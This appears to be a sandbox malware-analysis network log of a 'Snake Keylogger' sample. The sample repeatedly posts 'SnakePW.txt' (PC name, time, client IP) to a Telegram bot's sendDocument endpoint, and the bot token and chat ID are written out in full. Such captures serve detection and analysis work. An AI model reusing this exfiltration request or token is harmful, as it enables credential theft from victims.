                                                                    2022-06-26 07:34:37 UTC464OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 30 33 61 33 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571b03a336Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:37 UTC465INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:37 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:37 UTC465INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67060,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228877,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    276192.168.2.550210149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:37 UTC466OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571b3f3da5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:37 UTC466OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 33 66 33 64 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571b3f3da5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:37 UTC466INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:37 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:37 UTC467INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67062,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228877,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    277192.168.2.550211149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:37 UTC467OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571b7d4400
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:37 UTC468OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 37 64 34 34 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571b7d4400Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:38 UTC468INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:38 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:38 UTC468INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67063,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228878,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    278192.168.2.550212149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:38 UTC469OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571bb8d6a7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:38 UTC469OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 62 38 64 36 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571bb8d6a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:38 UTC470INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:38 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:38 UTC470INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67064,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228878,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    279192.168.2.550213149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:38 UTC471OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571befac4e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:38 UTC471OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 65 66 61 63 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571befac4eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:38 UTC471INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:38 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:38 UTC472INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67065,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228878,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    28192.168.2.549796149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:49 UTC47OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756db162a23
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:49 UTC47OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 31 36 32 61 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756db162a23Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:50 UTC48INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:50 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:50 UTC48INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66775,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228770,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    280192.168.2.550214149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:38 UTC472OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571c2b47ee
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:38 UTC473OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 32 62 34 37 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571c2b47eeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:39 UTC473INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:39 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:39 UTC474INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67067,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228879,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    281192.168.2.550215149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:39 UTC474OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571c6947c9
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
